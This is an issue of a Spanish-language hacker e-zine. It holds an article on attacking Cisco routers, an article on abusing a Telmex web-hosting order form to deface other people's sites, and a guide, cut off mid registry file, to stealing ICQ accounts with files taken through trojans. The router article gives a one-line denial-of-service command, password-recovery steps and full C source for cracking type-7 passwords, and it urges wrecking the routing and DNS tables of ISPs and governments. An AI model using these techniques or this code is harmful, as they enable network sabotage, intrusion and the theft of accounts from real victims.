Tabla de Contenidos
( 00-> Editorial ................................................... ]-( Editor )--
( 01-> Linux 'rulz', pero ... y Windows? ................. ]-( Yield )--
( 02-> Protector Telefonico ................................... ]-( DarkSide )--
( 03-> Analisis de Ws_ftp ..................................... ]-( Yo_Soy )--
( 04-> Tutorial de Emacs ...................................... ]-( Nahual )--
( 05-> Seguridad en Linux/Unix ............................. ]-( Satan )--
( 06-> El Mundo de los Routers Cisco .................... ]-( dr_fdisk^ )--
( 07-> Servicios Prodigy Web de Telmex ................ ]-( Vlad )--
( 08-> Robo de Cuentas de ICQ ............................. ]-( Stele )--
( 09-> Microsoft Windows Share Passwords ........... ]-( Yo_Soy )--
(10-> Sobrepasando Firewalls 101 ......................... ]-( 0x90 )--
(11-> Anarquia: Bombas ....................................... ]-( psiconauta )--
(12-> Prodigy Turbo: Los Costos Escondidos ......... ]-( KUMA )--
(13-> Personal Communications Services (PCS) ..... ]-( Yo_Soy )--
(14-> Oda a una Vida ........................................... ]-( Fatal )--
( 15-> Hoy 2 de Julio ............................................ ]-( Fatal )--
( 16-> Contacto: llaves PGP .................................. ]-( RMHT )--
( 17-> Programa TKE ......................................... ]-( Vlad )--
( 18-> Despedida ................................................. ]-( RMHT )--
-06--( El Mundo de los Routers Cisco )-------------------------------------------------------------------------------------------------------------------------RM-10]
-----[ dr_fdisk^ ]---------------------------------------------------------------------------------------------------------------------------------[dr_fdisk@ciudad.com.ar]
Bueno en este articulo se va a ver expresada la forma de configuracion de un Cisco IOS, Standard.
El lenguaje utilizado es muy simple asi pueden comprenderlo todos
1- Que es un router? 2- Comandos principales 3- Sacando informacion 4- El router desde el punto de vista del hacking 5- Despedida
*************************************************************************** [1] Que es un router? [1] ***************************************************************************
Los routers son equipos utilizados por grades redes, a traves de estos equipos se puede administrar,redireccionar, enlazar,etc., las diferentes subredes que se encuentran conectadas a el.
*************************************************************************** [2] Comandos principales de un Cisco [2] ***************************************************************************
COMANDO FUNCION ======= =======
help muestra ayuda ? " " enable Activa privilegios para poder modificar datos clock Muestra el reloj del sistema dialer Parametros de llamadas y estadisticas hosts IP nombre de dominio, tablas de hosts, nameserver location Muestra la localizacion del sistema modemcap Muestra la base de datos del modem ppp Parametros de PPP y estadisticas rmon Estadisticas del rmon sessions Informacion sobre conecciones de Telnet snmp Estadisticas del snmp tacacs Muestra tacacs+ y estadisticas terminal Configuracion de la terminal traffic-shape Configuracion del trafico users Muestra informacion sobre usuarios version Version del hardware y estado del software show Informacion variada sobre tablas de ruteo,etc. quit Cierra la sesion hangup " " " test test <telefono> [ <frame-count> ] [ <otras> ] local Va a modo local remote remote <estacion> set Setea varios items iproute Maneja tablas de enrutamiento. dnstab Maneja tabla de DNS local slip SLIP cslip SLIP compreso (u) menu Interface de menu telnet telnet <host> <puerto> tcp tcp <host> <puerto> ping ping <host> traceroute Tracea rutas rlogin rlogin [ -l user -ec ] <host> [ -l usuario ] open open < numero-de-modem | slot:modem-en-slot > resume Resume coneccion remota virtual close Cerrar conneccion kill kill <ID de la sesion>
************************************************************************** [3] Sacando informacion [3] **************************************************************************
Algo que nos seria de mucha utilidad podria ser las ips de las subredes que estan enlazadas al router, esto es de mucha utilidad.
cisco> iproute show
192.168.1.0/24 - ie0 C 0 0 40722 27473 192.168.1.30/32 - local CP 0 0 5431 27473 204.43.23.4/32 204.43.23.4 wan54 rT 60 1 3651 2980 24.0.0.0/4 - mcast CP 0 0 0 27473 24.0.0.1/32 - local CP 0 0 0 27473 24.0.0.2/32 - local CP 0 0 246 27473 24.0.0.5/32 - local CP 0 0 0 27473 24.0.0.6/32 - local CP 0 0 0 27473 24.0.0.9/32 - local CP 0 0 0 27473 255.255.255.255/32 - ie0 CP 0 0 2 27473
Zombies: 204.43.23.6.32/32 204.43.23.6.32 wanidle0 rT 60 16 259 283 204.43.23.6.45/32 204.43.23.6.45 wanidle0 rT 60 16 12 178
Lo que sacamos aqui es muy interesante, tomemos la primera linea:
IP de la RED/Mascara Interface /Clase Estadisticas generales -------------------- --- | -------------------- 192.168.1.0/24 - ie0 C 0 0 40722 27473
Otra cosa que nos podria servir es ver quien esta conectado. Para saber lo que vamos a hacer :-)
cisco>show users
I Session Line: Slot: Tx Rx Service Host User O ID Chan Port Data Rate Type[mpID] Address Name I 300631199 1:5 3:12 50000 31200 PPP 204.32.32.2 mary I 300631299 N/A 3:3 N/A N/A N/A N/A Answer I 300631399 N/A 3:3 N/A N/A N/A N/A Answer I 300631499 1:5 3:12 50000 31200 SLIP 204.32.32.3 andres
Esto nos podria servir para localizar las IPs asignadas a los diferentes usuarios que se encuentran en una coneccion SLIP o PPP a nuestro router,etc. Podemos saber quien esta online y que modems estans conectados. Todo esto lo observamos a simple vista :X
Otro comando que nos podria servir para nuestros propositos es el history, alli se haya grabado el log del sistema de comandos, podremos sacar mucha clase de informacion, por ej: las conecciones que se han realizado, los enlaces que se han modificado y todo tipo de actividad que se haya llevado a cabo en el menu de comandos.
cisco> show ip alias
Interface 10.2.1.2 Interface 192.182.12.1 Interface 212.291.22.255
Con esta funcion (show ip alias) nos mostrara los alias o sea las diferentes IPs que tiene el router en el que estamos conectados, , o sea en la red 212.291.22 la ip de nuestro router sera 212.291.22.255. Con esta informacion nos facilitara para movernos en las redes que esten conectadas a el.
********************************************************************* [4] El router desde el punto de vista del hacking [4] *********************************************************************
Empezemos por lo mas divertido :-)
Alguna vez se han puesto a pensar que pasaria si modificamos las tablas de enrutamiento?!?, bueno podriamos llegar a causar un GRAN CAOS en toda las subredes que se hayan conectadas al router, a que me refiero con caos?, bueno si logramos obtener permisos y modificar las tablas de enrutamiento podriamos llegar a hacer que todas las redes que esten interconectadas gracias al router dejen de estarlo o sea podria causar una caida general de la RED, se han imaginado si hariamos esto en un ROUTER de un ISP grande? o en un router de una empresa? o sin ir mas lejos en un router del Gobierno o llendo mas lejos en los routers del NIC :-)
Esto lo podemos realizar con el comando iproute y set, para ver mas informacion sobre estos pongan iproute ? o set ? y ahi se las imaginan,
************************************************************************
Otra cosa que podriamos llegar a hacer es algo un poco mas complejo, Lo mas interesante que se puede hacer seria reacomodar las tablas de enrutamiento a nuestro beneficio, a que me refiero con esto?!?, bueno imaginense que nuestra maquina este conectada a su red, podriamos trabajar desde nuestra estacion con mas libertades y podriamos tener acceso a toda la intranet que esta a tras del router. La forma basica de hacer esto es agregar nuestra direccion IP y Netmask correspondientes al enlace que el router tiene,esto no es muy complicado y es posible hacerlo. No voy a pasar a explicar como hacerlo pero ya saben para hacer esto tambien solo necesitaran modificar las tablas iproute ? o set ?, alli apararece todo lo que necesitaran.
***************************************************************************
Modificando las tablas de DNS, heh,, esto si que podria llegar a hacer un desastre, bueno si logramos modificar las tablas de DNS podriamos redireccionar el servidor principal a otra IP, por ej, si quieren hacer un manifiesto en su pagina web, no es necesario acceder al servidor de web, sino con solo modificar las tablas de DNS lo podrian hacer muy facilmente, esto lo pueden hacer con el comando: dnstab
***************************************************************************
Tirando a un cisco (DENIAL OF SERVICE ATTACK) ==============================================
Algunas versiones de Cisco son vulnerables al ataque, la forma de hacerlo es muy simple:
<eXtreme># perl -e'print 0xFF x10000' | telnet algun.cisco.de.la.red.com 2001
*************************************************************************** PASSWORD RECOVERY BUG ***************************************************************************
Necesitamos estar fisicamente en el router ------------------------------------------- Aca mostramos una de las tantas formas de hacerlo : ====================================================
Son vulnerables: ---------------- Todos los Cisco 2000, 2500, 3000, 680x0-Based 4000,7000 Corriendo 10.0 o posterior en ROMs, IGS corriendo 9.1 o posterior en ROMs
Vamos paso por paso: --------------------
1. Enlazar una coneccion al router
2. Tipear "show version" y graba la configuracion. Usualemnte 0x2102 o
0x102
3. Apagar el router y luego prenderlo
4. Presiona la tecla Break en la terminal despues de los 60 de segundos
de prendido, va a parecer el prompt del router ">" sin nombre.
5. Tipea "o/r0x42" en el > prompt para bootear o "o/r 0x41" para
bootear desde ROMs.
6. Tipea "i" en el > prompt. El router se reiniciara pero va a ignorar
la configuracion guardada.
7. Respnde "no" a todo en el setup.
8. Tipea "enable" en el "Router>" prompt.
9. Elije una de las tres opciones:
o To VIEW the password type "show config."
o To CHANGE the password (in case it is encrypted, for example):
a. Type "config mem" to copy the NVRAM into memory.
b. Type "config term" and make the changes to the configuration.
conf t
enable password password
ctrl-z
c. Type "write mem" to commit the changes.
o To ERASE the config, type "write erase.
10. Tipea "config term" en el prompt.
11. Tipea "config-register 0x2102,"
12. Presiona Ctrl-Z para salir del editor
13. Tipea "reload" en el prompt. Tu no necesitas memoria para guardar
**************************************************************************** PASSWORDS en CISCO **************************************************************************** El Shell script origianl fue escribo por Hobbit, (hobbit@avian.org) y esta disponible en ftp://avian.org.
La versiones 11.x son vulnerables.
Ej :
Password 7 08204E
La string encriptada es 08204E. Los primeros dos digitos son usados como base dentro de la string XOR.
08 corresponde al index de la string xor.
2 es multiplacdo por 16 y luego el digito siguien (0) es agregado a este. [ == 32]
32 XOR xorstring[08] = 'a'
Mueve a los siguientes dos caracteres y repite 4 * 16 = 64 64 + 14 (E) = 78 Incrementa el index dentro de la string xor 78 XOR xorstring[08] = 'b'
*******************************************************************************
PROGRAMAS: ========== ciscocrack.c
---------------------------------<CORTAR AQUI>-------------------------------
#include <stdio.h> #include <ctype.h>
char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1[] = "password 7 "; char pw_str2[] = "enable-password 7 ";
char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-1);
}
dec_pw[++i / 2] = 0;
return(0); }
usage()
{
fprintf(stdout, "Uso: %s -p <password encriptado>\n", pname);
fprintf(stdout, " %s <router config file> <output file>\n", pname);
return(0); }
main(argc,argv) int argc; char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;
case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;
default:
fprintf(stderr, "%s: unknow option.", pname);
}
return(0);
}
if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;
if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);
fprintf(out, "%s\n", passwd);
}
}
}
----------------------------<AQUI TERMINA>--------------------------------
*************************************************************************** [5] DESPEDIDA [5] ***************************************************************************
Bueno espero que les haya gustado y sobre todo servido.
Saludos, dr_fdisk^
Cualquier duda/acotacion: dr_fdisk@ciudad.com.ar RaZa MeXiCaNA TeAm
-----BEGIN PGP MESSAGE----- Version: 2.6.3i
owGtkcFKxDAQhmWPeYr/BdqLN0EwdLO00NalFql7UGabsQQ3DcRdXGVfyXd07EX3 JEi/8B/+PxlmmHwuhu3CxgsBv0iE6z/5fqVwTgONjQioYNChQCaunhK0EmlU6p+t VE2er2Dj07N1ry+PUMaT2/0kN707WLJpH3xKUeXB85oGKRmDUsmcqCyEaN1INkRY 3mEdwzv3+4DSjYcjuNtH9qwa2hAq7lxGNaFl7YG36aSIIHyIEngwjnDoxY2iFEFu hxlGPv+e5eV9UeJ2hTY3qE2LkzQ/TW5V1LrEUj+guENuGjPvvqC+AA== =lIZ7 -----END PGP MESSAGE-----
-07-( Servicios Prodigy Web de Telmex )-----------------------------------------------------------------------------------------------------------------------RM-10] -----[ Vlad ]---------------------------------------------------------------------------------------------------------------------------------------[vlad@raza-mexicana.org]
Telmex hace una vez mas de las suyas y ahora es el turno de hablar de su servicio Prodigy Web. Telmex entre otros tantos servicios (Deficientes hasta decir basta) cuenta con hospedaje de hojas Web con dominio propio (Claro, esto del dominio es problema de Internick de Mexico), las cuales cuentas con servicios basicos pero siempre necesarios como son Contador, Envio de formas, Directorio CGI y Extensiones FrontPage, los usuarios por default no cuentan con estos servicios sino hasta el momento en que estos los solicitan a Telmex. Bueno, vamos como dijo el pollo... vamos al grano. Para poderme explicar mejor y de una manera diferente pues lo hare con una historia XD (Los personajes son ficticios y cualquier parecido con la realidad es mera coincidencia).
Pepe es un usuario Prodigy Web con su dominio propio www.pepe-rulz.com.mx, la administracion de este sito la realiza via FTP (l/p pepe/soycabron), bueno Pepe no es muy popular en su escuela por ser tan pero tan creido, asi que uno de sus compa~eros (Blas, jeje) pues decide ver de que manera puede modificar el contenido de su pagina. Intentando en balde todo tipo de toyanos y keyloggers pues no puede conseguir su password, asi que decide ver el site de Prodigy Web Telmex para ver si en algun lugar aparece el login y el pass de Pepe (Mentalidad de ni~o jeje). http://www.prodigyweb.net.mx/ .. pues nada, no aparece el pass de ese cuate, pero Blas se da cuenta de que se pueden solicitar algunos servicios extras como contador directorio cgi y extensiones FrontPage, una idea loca paso por la mente de Blas: "igual y tienen extensiones de frontpage bugientas" asi que intento entrar en el servidor y pues no tenia extensiones, un poco desconsolado Blas dio un click en la forma de solicitud de servicios adicionales (http://www.prodigyweb.net.mx/contratar/webserver.htm) se percato de que se podian solicitar los servicios de cualquier sitio hospedado con ellos y que la notificacion de activacion de servicios podia llegar a cualquier direccion de correo, jeje, asi que creo una cuenta ficticia (Con una sonrisa endemoniada en su rostro) en un servidor de email gratis y solicito todos los servicios (Que idea loca ahora pasaba por su mente?). Ocho horas despues (Como siempre Telmex muy rapido en sus servicios) llego la notificación:
//*** Inicio del Mensaje
From: Top of Form 1 "Webmaster" <webmaster@webtelmex.net.mx>
Contador Ya puede hacer uso de su contador. Puede colocar la siguiente instruccion: <img src="/cgi/count.exe?df=pepe-rulz.dat&ft=0"> Consulte http://www.prodigyweb.net.mx/soporte/contador.htm para revisar otras opciones.
Forma Ya puede hacer uso de las formas de captura. Consulte http://www.prodigyweb.net.mx/soporte/formacaptura.htm para revisar las instrucciones.
FrontPage Las extensiones de Microsoft Frontpage han sido instaladas en su servidor web. Le recomendamos realice una copia de respaldo de sus archivos, para conservar permisos.
//*** Fin del Mensaje
K00l como diairia Trovalz "Le recomendamos realice una copia de respaldo de sus archivos, para conservar permisos" jejejeje, eso era todo, ahora tenia extensiones de frontpage y con privilegios de todo, lista para ser actualizada desde cualquir lugar y por cualquier persona. El resto de la historia pues se las dejo a su imaginacion.
Bueno, la solicitud de extensiones de FrontPage las puede solicitar cualquier persona para cualquier sitio web hospedado en
Telmex y si no las sabes usar (el caso de Pepe y el de Blas) o no te enteraste de que alguien las solicito por ti y que ahora
as tienes... pues dejas tu sitio web listo para que cualquier persona entre y modifique o substraiga informacion. Desde mi
punto de vista Telmex no deberia permitir esto pero en fin, ahi se los dejo para que tomen sus precauciones.
Vlad
-08-( Robo de Cuentas de ICQ )------------------------------------------------------------------------------------------------------------------------------------RM-10] -----[ Stele ]-----------------------------------------------------------------------------------------------------------------------------------------------[prepucio@usa.net]
....ooOO00| Robo de cuentas de ICQ |00OOoo....
- Por Stele -
El ICQ, ese maravilloso programa para comunicarnos con la raza que tanto nos gusta y tanto queremos, pero que tan poco seguridad tiene. El tema a tratar en este articulo sera como robarse una cuenta de ICQ con lista y todo y registrarla en nuestra maquina sin ningun problema, ademas de que nos mostrara la clave del icq de la victima... xD
Lo primero que tenemos que hacer es obtener los siguientes archivos:
UIN.idx ------. UIN.dat | UINmsg.dat |---> En donde UIN es el numero de icq de la victima. UINmsg.idx | UINhis.idx | UINhis.dat ---'
La parte mas dificil de todo el proceso es esta, despues de que te consigas esos archivos el resto es facil. Puedes obtener estos archivos de diferentes formas, por el netbus, el BO, ingenieria social, etc etc...
Ok, ahora vienen los pasos para terminar nuestra operacion:
1. Cuando tengas estos archivos copialos a tu carpeta ICQ\DB\ (Ej. C:\Archivos de programa\ICQ\DB\ ) 2. Si tienes tu icq abierto, cierralo 3. Abre notepad o cualquier otro editor de texto y copia el siguiente texto:
<----------Cortar aqui -----------------> REGEDIT4
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN] "Name"="ICQ Robado"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs] "Random Groups Version"=dword:0000000a "Online Color"=dword:00ff0000 "Unlisted Color"=dword:00800000 "Offline Color"=dword:000000ff "Authorize Color"=dword:00400080 "Notify Color"=dword:00800080 "LastStatus Color"=dword:00008000 "Default File Dir"="C:\\Archivos de Programa\\ICQ\\Received Files" "SMTP Address"="" "DND Message"="Please do not disturb me now. Disturb me later." "Out Message"="" "Busy Message"="User is occupied. Only urgent messages will be delivered." "Chat Message"="I would lique to chat about anything" "Away PreNum"=dword:00000000 "Out PreNum"=dword:00000000 "Busy PreNum"=dword:00000000 "DND PreNum"=dword:00000000 "Chat PreNum"=dword:00000000 "File Options"=dword:00000004 "URL Options"=dword:00000004 "Chat Options"=dword:00000004 "All Options"=dword:0000000e "EXT Options"=dword:00000004 "Startup"="No" "Auto Away"="No" "Auto Hide Time"=dword:0000001e "Auto Hide"="No" "Move Server Top"="No" "Blink In Tray"="No" "Sort Lists"="Yes" "Show Online List"="No" "Remove AddFriend"="Yes" "Splash Open"="Yes" "History Last First"="Yes" "FloatTop"="Yes" "Thru Server"="No" "Join Chat"="No" "Open URL Browser"="No" "Refuse File NotInList"="No" "Overwrite ExistFile"="No" "Disable Online Alert"="Yes" "Accept Urgent In Busy"="No" "Blink Tray In AwayBusy"="Yes" "Use Contact List Color"="No" "Contact List Color"=dword:00c8b99d "Save User File"="Yes" "Auto Update"="Yes" "Search Wizard"="No" "Default Mailer"="Yes" "Pop Play Sound"="Yes" "Pop Auto Launch"="No" "Pop Check"="No" "Pop Time"=dword:0000000a "Check Headers"="Yes" "MoveToOutDelay"=dword:00000014 "MoveToOut"="No" "MoveToAwayDelay"=dword:0000000a "MoveToAway"="No" "Auto Sleep Mode"="No" "Log History Events"="Yes" "Connection Type"="Permanent" "Firewall"="Yes" "UseGivenIP"="No" "Socks"="No" "SocksPort"=dword:00000438 "SocksServer"="Enter your socks server" "ProxySocks4Host"="Enter your proxy server" "ProxySocks4Port"=dword:00000438 "UseProxySocks4"="No" "GiveStats"="No" "SocksVersion"=dword:00000004 "SocksAuthentication"=dword:00000000 "FirewallTimeout"=dword:0000001e "UseFirewallTimeout"="No" "UseFirewallRangePorts"="Yes" "FirewallFromPort"=dword:000059d8 "FirewallToPort"=dword:00007148 "Old Sockets"="No" "UserType"=dword:00000000 "Mail Receipients"=";" "Random Available"="No" "RandomGroupName"=dword:00000001 "Random Name"="#¥d¶³ 666 £[" "Allow Secure Clients Only"="Yes" "PhoneApproval"="Yes" "PhoneToneTime"=dword:00000032 "PhonePauseTime"=dword:000001f4 "PhoneBreakTime"=dword:00000028 "PhoneSettings"=dword:00000001 "PhonePauseChar"="," "PhoneLocalP"=" " "PhoneLongP"=" " "PhoneInterP"=" " "Chat RoomName"="Product Support / Suggestion" "Auto Join Chat Room"="Yes" "Novice Counter"=dword:0000000a "Menu Counter"=dword:00000013 "Servers Version"=dword:00000001 "Externals Version"=dword:00000019 "Stats"=hex:60,ff,ea,52,5c,36,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,0 0,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 "Novice"="No" "Dropped Users"=hex:01,00,00,00,43,ca,35,00,e6,02,1f,00 "State Flags"=dword:00000000 "Server Msg Version"=dword:0000000b "Server Msg Shown"=dword:00000001 "Server Msg Count"=dword:00000009 "LeftButton Warning"="No" "Menu Left Click"="No" "Tip Startup"="No" "Tip Position"=dword:00000000 "MoreEvents Warning"="No" "Invisible Warning"="No" "Send Later Warning Off"="No" "Busy Warning"="No" "Away Warning"="No" "DND Warning"="No" "FT Warning"="No" "Ext Warning"="No" "Out Warning"="No" "Chat Warning"="No" "Away Message"="User is currently away\r\nYou can leave him/her a message" "Random Comment"="Stele r00lz!\r\n\r\nhttp://Stele.tripod.com\r\nStele r00lz!."
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\YOURUIN\Prefs\Presets] "OutMsg Presets 0"="I'm out'a here. See you tomorrow!" "DNDMsg Presets 0"="Please do not disturb me now. Disturb me later." "Away PresetsMsg 0"="Away" "Out PresetsMsg 0"="Out for the day" "Busy PresetsMsg 0"="Busy" "DND PresetsMsg 0"="DND" "Chat PresetsMsg 0"="Chat" "AwayMsg Presets 1"="I am out to lunch. I will return shortly." "OutMsg Presets 1"="" "DNDMsg Presets 1"="I am currently in a meeting. I can't be disturbed." "ChatMsg Presets 1"="Come Join my chat room!" "Away PresetsMsg 1"="Lunch" "Out PresetsMsg 1"="Not here" "Busy PresetsMsg 1"="Meeting" "DND PresetsMsg 1"="Meeting" "Chat PresetsMsg 1"="Come In" "AwayMsg Presets 2"="Don't go anywhere! I'll be back in a jiffy!" "OutMsg Presets 2"="I'm closed for the weekend/holidays." "DNDMsg Presets 2"="Don't disturb my concentration!" "ChatMsg Presets 2"="Don't miss out on the fun! Join our chat!" "Away PresetsMsg 2"="Be right back" "Out PresetsMsg 2"="Closed" "Busy PresetsMsg 2"="Concentration" "DND PresetsMsg 2"="Concentration" "Chat PresetsMsg 2"="Fun" "AwayMsg Presets 3"="I'm out with the dog. Be back when he's finished." "OutMsg Presets 3"="Gone fishin'." "DNDMsg Presets 3"="I'm on the phone. Don't disturb me!" "ChatMsg Presets 3"="What are you waiting for? Come on in!" "Away PresetsMsg 3"="Dog Walk" "Out PresetsMsg 3"="Fishing" "Busy PresetsMsg 3"="On the Phone" "DND PresetsMsg 3"="On the Phone" "Chat PresetsMsg 3"="Don't Wait" "AwayMsg Presets 4"="Went out for a smoke. " "OutMsg Presets 4"="I'm sleeping. Don't waque me." "DNDMsg Presets 4"="I can't chat with you now. I'm busy." "ChatMsg Presets 4"="We'd love to hear what you have to say. Join our chat." "Away PresetsMsg 4"="Smoke" "Out PresetsMsg 4"="Sleeping" "Busy PresetsMsg 4"="Can't chat " "DND PresetsMsg 4"="Can't chat " "Chat PresetsMsg 4"="Hear" "AwayMsg Presets 5"="On my Coffee break." "OutMsg Presets 5"="Went home. Had to feed the kids." "DNDMsg Presets 5"="Can't you see I'm working?" "ChatMsg Presets 5"="Enter your chat room message here" "Away PresetsMsg 5"="Coffee" "Out PresetsMsg 5"="Kids" "Busy PresetsMsg 5"="Working" "DND PresetsMsg 5"="Working" "Chat PresetsMsg 5"="Empty" "AwayMsg Presets 6"="Went to get some fresh air." "OutMsg Presets 6"="Gone for good." "DNDMsg Presets 6"="Enter your occupied message here" "ChatMsg Presets 6"="Enter your chat room message here" "Away PresetsMsg 6"="Air" "Out PresetsMsg 6"="Gone" "Busy PresetsMsg 6"="Conversing" "DND PresetsMsg 6"="Empty" "Chat PresetsMsg 6"="Empty" "BusyMsg Presets 7"="User is occupied. Only urgent messages will be delivered." "DNDMsg Presets 7"="Enter your occupied message here" "ChatMsg Presets 7"="Enter your chat room message here" "Away PresetsMsg 7"="Empty" "Out PresetsMsg 7"="Empty" "Busy PresetsMsg 7"="Empty" "DND PresetsMsg 7"="Empty" "Chat PresetsMsg 7"="Empty" "BusyMsg Presets 0"="User is currently Occupied" "ChatMsg Presets 0"="I would lique to chat about anything" "BusyMsg Presets 1"="User is currently Occupied1" "BusyMsg Presets 2"="User is currently Occupied2" "BusyMsg Presets 3"="User is currently Occupied" "BusyMsg Presets 4"="User is currently Occupied" "BusyMsg Presets 5"="User is currently Occupied" "BusyMsg Presets 6"="User is currently Occupied" "AwayMsg Presets 7"="User is currently away" "OutMsg Presets 7"="User is currently N/A" "AwayMsg Presets 0"="User is currently away\r\nYou can leave him/her a message"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD]
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message0] "Message"="Please bookmark our network status page." "URLName"="http://www.mirabilis.com/status.html" "URL"="press here" "Date"=""
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message1] "URLName"="http://www.mirabilis.com/emailsig.html" "URL"="Go to the ICQ e-mail signature generator" "Date"=""
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message2] "Message"="ICQ is doing it again! One more new service from ICQ for your pleasure! Create your ICQ interest group - home, work, family, hobby, affiliation, sports, music...etc..( It's straight forward, no HTML needed! )" "URLName"="http://www.icq.com/announcements/02.html" "URL"="It's fun and easy, GO!!" "Date"="31-MAR-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message3] "URLName"="http://www.icq.com/announcements/whitepages.html" "URL"="Go!" "Date"="1-APR-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message4] "Message"="ICQ can notify you when you receive an e-mail and show you the e-mail headers! Learn how to do it!" "URLName"="http://www.mirabilis.com/email.html" "URL"="E-mail notification instructions" "Date"="15-JUN-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Messag e5] "URLName"="http://www.icq.com/announcements/05.html" "URL"="Create your Greeting" "Date"="12-JUL-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Messag e6] "URLName"="http://www.icq.com/announcements/06.html" "URL"="Click For More Information" "Date"="26-AUG-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Messag e7] "Message"="ICQ can alert you when you receive Emails and show you the Email headers!" "URLName"="http://www.icq.com/announcements/07.html" "URL"="Learn how to do it" "Date"="06-SEPT-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Messag e8] "URLName"="http://www.icq.com/announcements/06.html" "URL"="Click For More Information" "Date"="20-OCT-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroup s]
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroup s\RandomGroup1] "Name"="General Chat" "Number"=dword:00000001 "Version"=dword:00000001
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroup s\RandomGroup2] "Name"="Romance" "Number"=dword:00000002 "Version"=dword:00000002
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroup s\RandomGroup3] "Name"="Games" "Number"=dword:00000003 "Version"=dword:00000003
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroup s\RandomGroup4] "Name"="Students" "Number"=dword:00000004 "Version"=dword:00000004
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroup s\RandomGroup5] "Name"="20 Something" "Number"=dword:00000006 "Version"=dword:00000006
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroup s\RandomGroup6] "Name"="30 Something" "Number"=dword:00000007 "Version"=dword:00000007
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroup s\RandomGroup7] "Name"="40 Something" "Number"=dword:00000008 "Version"=dword:00000008
